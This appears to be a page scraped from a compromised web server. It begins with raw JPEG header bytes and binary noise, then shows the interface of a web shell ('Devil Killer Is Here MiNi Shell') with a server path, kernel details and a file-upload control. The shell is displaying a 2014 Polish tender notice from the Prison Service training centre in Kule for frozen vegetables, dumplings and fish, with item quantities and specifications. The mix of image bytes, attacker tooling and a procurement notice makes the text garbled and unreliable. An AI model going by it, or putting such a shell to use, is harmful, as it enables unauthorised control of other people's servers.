JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141218/261363-N-2014.html

<p class="kh_header"><b>Popów: Dostawy mrożonek, ryb i konserw rybnych dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie</b><br>
<b>Numer ogłoszenia: 261363 - 2014; data zamieszczenia: 18.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Szkolenia Służby Więziennej w Kulach , Kule 2, 42-110 Popów, woj. śląskie, tel. 034 3104030, faks 034 3103653.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Szkolenia Służby Więziennej w Kulach.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy mrożonek, ryb i konserw rybnych dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są  dostawy mrożonek, ryb i konserw rybnych dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie.
1.zadanie  nr 1  - dostawy , mrożonek dla OSSW w Kulach: 
1.	Pyzy z mięsem	kg	200
2.	Brokuły		kg	300
3.	Frytki 		kg	300
4.	Mieszanka owocowa kg	600
5.	Mieszanka warzywna 7 składnikowa	kg	300
6.	Szpinak kg	50
7.	Warzywa na patelnię	kg	300
8.	Pierogi z serem	kg	200
9.	Pierogi z kapustą i grzybami	kg	100
10	Uszka z mięsem	kg	100
11	Paszteciki z mięsem	kg	70
12	Pizza mrożona	Szt.	700
13	Knedle z truskawkami	kg	200
14	Kalafior	kg	400
15	Fasolka szparagowa	kg	400
16	Krokiety z mięsem		kg	20
17	Kartacze z mięsem	kg	300
18	Kukurydza mrożona	kg	20
19	Papryka mrożona 	kg	20
20	Frytki - kuleczki		kg	200
Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 6 do SIWZ. 
2. Przedmiotem zamówienia na zadanie nr 2 są - dostawy  ryb i konserw rybnych dla OSSW  w Kulach  
1.	Filet śledziowy a la matias kg	200
2.	Filet z dorsza SHP	 kg	800
3.	Tuńczyk w oleju	kg	100
4.	Filet z mintaja SHP kg	200
5	Szprot w sosie pomidorowym	kg	200
Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 6 a do SIWZ.
3. Przedmiotem zamówienia na zadanie  nr 3 są - dostawy , mrożonek dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie: 
1	Różyczki kalafiorowe zamrożone kg	200
2	Brokuły różyczki zamrożone kg	250
3	Kapusta brukselka zamrożona	kg	200
4	Fasolka szparagowa cięta zamrożona kg	200
5	Marchew typu junior mrożona kg	100
6	Marchew plastry mrożona kg	100
7	Marchew kostka mrożona  kg	250
8	Groszek zielony mrożony kg	80
9	Mieszanka warzywna 7-składnikowa mrożona kg	130
10	Mieszanka chińska kg	200
11	Frytki karbowane	kg	100
12	Podgrzybek mrożony klasa I	kg	100
13	Mieszanka kompotowa	kg	600
Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 6 b do SIWZ.
4 Przedmiotem zamówienia na zadanie nr 4 są - dostawy  ryb i konserw rybnych dla OSSW  w Kulach Oddział Zamiejscowy w Sulejowie   

1	Miruna  mrożona filet  ze skórą kg	400
2	Paluszki rybne kg	80
3	Makrela wędzona tusza b/głowy kg	50
4	Śledzie solone matias	kg	100
5	Śledzie po kaszubsku	kg	100
6	Filet z makreli w pomidorach	kg	80
7	Szprot w oleju	kg	80
8	Tuńczyk w oleju	kg	60
9	Ryba z pieca kg	200.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.33.11.70-9, 15.22.00.00-6, 15.24.30.00-3, 15.24.00.00-2, 15.23.40.00-7, 15.24.12.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz ofertowy stanowiący załącznik nr 1 do SIWZ,
wypełniony i podpisany formularz cenowy w zakresie zadań od nr 1-4 stanowiący załącznik nr 2 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Szkolenia Służby Więziennej w Kulach
Kule 2 
42-110 Popów
Pawilon WARTA, dział kwatermistrzowski pok. nr 2,3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2014 godzina 10:00, miejsce: Ośrodek Szkolenia Służby Więziennej w Kulach
Kule 2 
42-110 Popów
Budynek socjalny nr 2  - Świetlica.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy , mrożonek dla OSSW w Kulach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Pyzy z mięsem 15896000-5 PN-A-82201 Opakowanie jednostkowe 400- 500g.Ciasto - skład: ciasto:- ziemniaki gotowane 37%, woda, grys ziemn. 23%, skrobia ziemniaczana, sól. Farsz: mięso gotowane wieprzowe 32%, wołowe 32%, cebula duszona,, tłuszcz wieprzowy, błonnik 3,2%, sól, przyprawy. Zawartość w wyrobie: mięsa nie mniej niż 12%, ziemniaków 30%, grysu 18,5%, farszu  nie mniej niż 20%. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg 200
2.Brokuły 15331170-9   PN-A-78602	 Op.jedn. 400-500g. Produkt głęboko mrożony. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.kg 300
3. Frytki 15311100-2 Op. jedn.2 - 2,5 kg. Szybkosmażące frytki karbowane podsmażone i  zamrożone. Składniki: ziemniaki, olej roślinny, dextroza. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg 300
4.Mieszanka owocowa	15896000-5 PN - 86/8165-29	Op.jedn. 400-500g. Produkt  naturalny głęboko mrożony. Skład: Owoce ( truskawki, śliwki, porzeczki, wiśnie, agrest, aronie) w różnych proporcjach. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg 600
5.Mieszanka warzywna  7 składnikowa	15331170-9 PN-A-78608 Op.jedn. 400-500g. Produkt głęboko mrożony. Skład: marchew, kalafior, fasola szparag. pietruszka seler, cebula, groch zielony. Termin przydatności do spożycia : nie krótszy niż 30 dni od daty dostawy. kg 300
6. Szpinak	15331170-9 PN-A-78608 Op.jedn. 400-500g. Produkt rozdrobniony głęboko mrożony. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg 50
7.Warzywa na patelnię	15331170-9  PN-A-76608 Op.jedn. 400-500g. Mieszanka warzywna o składzie: kalafior, marchew, brokuły, seler, cebula, kapusta biała, groch zielony, kukurydza. Produkt głęboko mrożony.  Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg 300
8.Pierogi z serem	15896000-5 PN-A-82201 Op. jedn. 400-500g. Pierogi domowe, ręcznie robione, głęboko mrożone. Skład: ser twarogowy nie mniej niż 40%, mąka pszenna, woda, cukier, jaja, cukier waniliowy. Minimalna zawartość nadzienia  nie mniej niż 40%. Produkt nie powinien zawierać barwników. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg 200
9.Pierogi z kapustą i grzybami	15896000-5 PN-A-82201 Op jedn 400-500g. Skład: mąka pszenna, kapusta kwaszona nie mniej niż 27%, woda, grzyby leśne nie mniej niż 7%, tłuszcz roślinny utwardzony, przyprawy, cebula, jaja. Zawartość nadzienia min. 40%. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg	100
10 Uszka z mięsem	15896000-5  PN-A-82201 Op jedn  400-500g. Produkt głęboko mrożony. Skład: mąka pszenna, minimalna zawartość mięsa wołowe 24%, woda, bułka tarta, jaja, cebula, przyprawy. Minimalna zawartość nadzienia 28%. Produkt nie zawierający barwników. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg 100
11 Paszteciki z mięsem	15896000-5 PN-A-82201:1996 Paszteciki waga 1 szt nie mniej niż 60g. Produkt głęboko  mrożony. Skład: mąka pszenna, mięso wołowe,
tekstura sojowa, mięso wieprzowe, bułka tarta, suszona cebula, mleko, drożdże, przyprawy. Zawartość farszu nie mniej niż 30 %. Zawartość mięsa wołowego w farszu nie mniej niż 25%. Zawart. mięsa wieprzowego w farszu nie mniej niż 12%. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg	70
12 Pizza mrożona	15896000-5	 Skład: Spód: mąka, woda, olej, cukier, sól, drożdże, Obłożenie: koncentrat pomidorowy, pomidor, szynka nie mniej niż 1,6% ( w tym mięso wieprzowe 47%, mięso wołowe 5%), pieczarki nie mniej niż 3%, brokuł, ser, cebula, przyprawy. Masa netto 300- 320g. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. szt	700
13 Knedle z truskawkami	15896000-5  PN-A-82201	Op jedn 400-500g. Skład: ciasto: ziemniaki gotowane nie mniej niż 54,8%, mąka pszenna nie mniej niż 18%, woda, skrobia ziemniaczana nie mniej niż 9%, płatki ziemniaczane, sól. Farsz: truskawki mrożone nie mniej niż 79.8%, cukier, zagęszczacz. Zawartość w wyrobienie mniej niż: truskawki  16%, ziemniaki do 11%, mąka pszenna 3,6%, farsz nie mniej niż 20%. Termin przydatności do spożycia; nie krótszy niż 30 dni od daty dostawy.
kg 200 
14	Kalafior	15331170-9 PN-A-78602	Kalafior różyczki. Skład kalafior 100%. Produkt głęboko mrożony. Waga 400-500g. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg	400
15 Fasolka szparagowa	15331170-9 PN-A-78601 Fasola szparagowa cięta. Produkt głęboko mrożony. Waga 400-500g. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg	400
16 Krokiety z mięsem	15896000-5 PN-A-82201-1996 Op jedn 2,5 kg. Skład: Ciasto - woda, mąka pszenna, mleko w proszku odtłuszczone, jajka, sól. Farsz -  mięso wołowe i wieprzowe po nie mniej niż 34%. Panierka - bułka tarta. Zawartość w wyrobie: mięso nie mniej niż  20,4 %, farsz  nie mniej niż 30%. Waga 1 szt do 60g. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg	20
17	Kartacze z mięsem	15896000-5 PN-A-82201-1996	op.jedn. 2,5 kg. Skład: Ciasto - ziemniaki gotowane do 37%, woda, grys ziemniaczany do 23%, skrobia ziemniaczana, sól. Farsz - mięso gotowane wieprzowe nie mniej niż 32%, wołowe nie mniej niż 32%, cebula duszona, tłuszcz wieprzowy, błonnik 3,2 %, sól, przyprawy. Zawartość w wyrobienie mniej niż: mięsa 12,8%, ziemniaków 30%, grysu 18,5 %, farsz   20%. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg	300
18	Kukurydza mrożona	15331170-9	Op jedn. 2 - 2,5kg. Mrożone ziarno kukurydzy. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.
kg	20
19 Papryka mrożona 	15331170-9	Op. jedn. 2 - 2,5 kg Papryka mrożona cięta  czerwona lub kolorowa. Termin przydatności do spożycia : nie krótszy niż 30 dni od daty dostawy.  kg	20
20 Frytki - kuleczki	15311100-2	Op jedn 2 - 2,5 kg. Szybkosmażące frytki kuleczki. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.
kg 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.33.11.70-9, 15.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy  ryb i konserw rybnych dla OSSW  w Kulach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Filet śledziowy a la matias	15241200-1	 Skład: filet śledziowy, sól, ocet, zaprawa śledziowa. Masa 5 kg, masa ryby 4 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	kg	200
2.Filet z dorsza SHP 15220000-6 PN-A-86755:1991 Filety z ryb dorszowatych. Shatter pack. ( nie dopuszcza  się JQF), bez obcych zanieczyszczeń, po rozmrożeniu maksymalny ubytek masy nie więcej niż 5%, barwa mięsa charakterystyczna dla danego gatunku. Produkt głęboko mrożony. Opakowania: kartony od 6 do 10 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	kg800 3. Tuńczyk w oleju 15243000-3PN-V-74012	Jasne mięso tuńczyka. Duże kawałki Skład:tuńczyk duże kawałki, olej roślinny, sól. Masa netto 170-200g, masa po odcieku nie mniej niż 120g. Termin przydatności do spożycia nie krótszy niż 6 miesięcy od daty dostawy. Kg 100
  4.	Filet z mintaja SHP	15220000-6 PN-A-86755 :1991	Mrożone filety z mintaja, całe bez skóry , Shatter pack ( nie dopuszcza się JQF), bez obcych zanieczyszczeń, po rozmrożeniu maksymalny ubytek masy nie więcej niż 5%, barwa mięsa charakterystyczna dla danego gatunku. Produkt głęboko mrożony . Opakowania: kartony od 7 do 10 kg. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy. kg 200
5. Szprot w sosie pomidorowym	15240000-2 PN-V-74012	Skład: szprot nie mniej niż 40%, sos pomidorowy: woda, koncentrat pomidorowy, cukier, sól spożywcza, ocet spirytusowy, skrobia modyfikowana, mąka pszenna, olej roślinny, zagęstnik: guma guar, warzywa: seler, pietruszka, przyprawy. Masa netto  300 - 350g. Termin przydatności do spożycia nie krótszy niż 6 miesięcy od daty dostawy.	kg 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.24.12.00-1, 15.22.00.00-6, 15.24.30.00-3, 15.24.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy , mrożonek dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Różyczki kalafiorowe zamrożone klasa I	15331170-9 PN-A-78602:1996;	różyczki - część róży kalafiorowej, powstałej przez jej rozdzielenie na mniejsze części, z głąbikami przyciętymi do 20 mm, mierząc od nasady najniższego rozgałęzienia. Wielkość 15 do 35 mm; wygląd - różyczki, bez przerastających zielonych listków, bez uszkodzeń mechanicznych, bez zlepieńców trwałych, nie oblodzone, bez zanieczyszczeń. Opakowanie jednostkowe: torebka foliowa termozgrzewalna do 2,50 kg. Opakowanie zbiorcze - pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy. kg 200
2 Brokuły różyczki zamrożone klasa I	1533170-9	różyczki - część róży brokułowej, powstałej przez jej rozdzielenie na mniejsze części, z głąbikami przyciętymi do 20 mm, mierząc od nasady najniższego rozgałęzienia. Wielkość 15 do 35 mm; wygląd - różyczki, bez przerastających zielonych listków, bez uszkodzeń mechanicznych, bez zlepieńców trwałych, nie oblodzone, bez zanieczyszczeń. Opakowanie jednostkowe: torebka foliowa termozgrzewalna do 2,50 kg. Opakowanie zbiorcze - pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	kg	250
3 Kapusta brukselka zamrożona klasa I	15331170-9 PN-A-78603:1996;	brukselka - kapusta, główki obrane z zewnętrznych liści, całe, bez uszkodzeń mechanicznych, zwarte, bez zlepieńców trwałych, nie oblodzone, główka koloru zielono-kremowego, bez zanieczyszczeń. Opakowanie jednostkowe: torebka foliowa termozgrzewalna do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	 kg 200
4 Fasolka szparagowa cięta zamrożona 	15331170-9 PN-A-78601:1994;	zielona lub żółta, zamrożona, w postaci strąków ciętych; kształtne, niepołamane, sypkie, wolne od zlepieńców, bez skazy, barwa - intensywna zielona lub żółta, nie zbrązowiała, jednolita w całej masie partii, bez uszkodzeń przez choroby, szkodniki; konsystencja w stanie zamrożonym twarda, po ugotowaniu krucha, bez mączystych ziaren, nie gąbczasta, nie włóknista, bez zanieczyszczeń. Opakowanie jednostkowe: torebka foliowa termozgrzewalna do 2,50 kg. Opakowanie zbiorcze: pudło kartonowe do 10 kg. Termin przydatności do spożycia: nie krótszy niż 30 dni od daty dostawy.	kg 200
